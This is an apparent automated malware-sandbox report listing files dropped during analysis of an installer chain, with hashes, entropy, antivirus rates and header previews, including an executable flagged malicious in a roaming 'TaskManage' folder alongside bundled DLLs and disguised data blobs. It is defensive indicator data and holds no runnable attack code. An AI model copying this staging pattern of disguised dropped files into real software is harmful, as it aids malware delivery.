                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\page_embed_script.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):291
                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130866
                                                                                                                                                            Entropy (8bit):5.425065147784983
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                            MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                            SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                            SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                            SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\xbsvw

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2602496
                                                                                                                                                            Entropy (8bit):6.716476069650749
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                            MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                            SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                            SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                            SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2598912
                                                                                                                                                            Entropy (8bit):6.6049974235008655
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                            MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                            SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                            SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                            SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<*,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&..*...Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):8581632
                                                                                                                                                            Entropy (8bit):6.736578346160889
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
                                                                                                                                                            MD5:831BA3A8C9D9916BDF82E07A3E8338CC
                                                                                                                                                            SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
                                                                                                                                                            SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
                                                                                                                                                            SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1053696
                                                                                                                                                            Entropy (8bit):6.539052666912709
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                            MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                            SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                            SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                            SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):356352
                                                                                                                                                            Entropy (8bit):6.447802510709224
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                            MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                            SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                            SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                            SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6487736
                                                                                                                                                            Entropy (8bit):7.518089126573906
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                            MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                            SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                            SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                            SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):664064
                                                                                                                                                            Entropy (8bit):6.953961612144461
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                            MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                            SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                            SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                            SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\hypochondriac.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60283
                                                                                                                                                            Entropy (8bit):4.569551839311306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                            MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                            SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                            SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                            SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):421200
                                                                                                                                                            Entropy (8bit):6.59808962341698
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                            MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                            SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                            SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                            SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):770384
                                                                                                                                                            Entropy (8bit):6.908020029901359
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                            MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                            SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                            SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                            SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Roaming\TaskManage\wiggery.bmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4567853
                                                                                                                                                            Entropy (8bit):7.952114001019503
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                            MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                            SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                            SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                            SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\BootstrapperApplicationData.xml

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1986
                                                                                                                                                            Entropy (8bit):3.7259224395984756
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
                                                                                                                                                            MD5:3DA2E442D7803E1DADC2E8D8F383B817
                                                                                                                                                            SHA1:1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
                                                                                                                                                            SHA-256:5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
                                                                                                                                                            SHA-512:8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".H.e.b.e.p.h.r.e.n.i.a.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.4.6.b.b.f.d.e.-.2.e.2.c.-.4.5.c.e.-.9.b.b.b.-.9.a.5.3.3.c.5.3.c.d.8.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.8.A.C.9.6.A.5.B.-.2.5.D.4.-.4.2.0.7.-.A.A.1.4.-.9.6.4.D.F.4.7.4.3.F.D.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".F.l.o.t.s.a.m.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".A.p.p.V.T.e.m.p.l.a.t.e.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".3.1.6.4.1.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".3.1.6.4.1.6.". .I.n.s.t.a.l.l.e.d.S.i.z.e.=.".

                                                                                                                                                            C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dll

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):180800
                                                                                                                                                            Entropy (8bit):5.521664858470418
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
                                                                                                                                                            MD5:CA03420E7D92D1E8C8726615879FE50D
                                                                                                                                                            SHA1:49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
                                                                                                                                                            SHA-256:501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
                                                                                                                                                            SHA-512:8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
                                                                                                                                                            Malicious:false
